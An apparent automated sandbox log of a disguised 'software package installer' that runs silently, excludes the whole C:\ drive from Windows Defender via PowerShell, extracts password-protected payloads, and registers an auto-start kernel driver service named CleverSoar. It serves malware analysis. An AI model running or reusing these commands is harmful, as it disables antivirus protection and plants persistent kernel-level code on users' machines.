Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static file information: File size 5694753 > 1048576
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1801210662.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1800990919.0000000003840000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_004057D0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: real checksum: 0x0 should be: 0x56ef0c
Source: update.vac.1.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: updat4.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: real checksum: 0x0 should be: 0x34399d
Source: update.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x376862
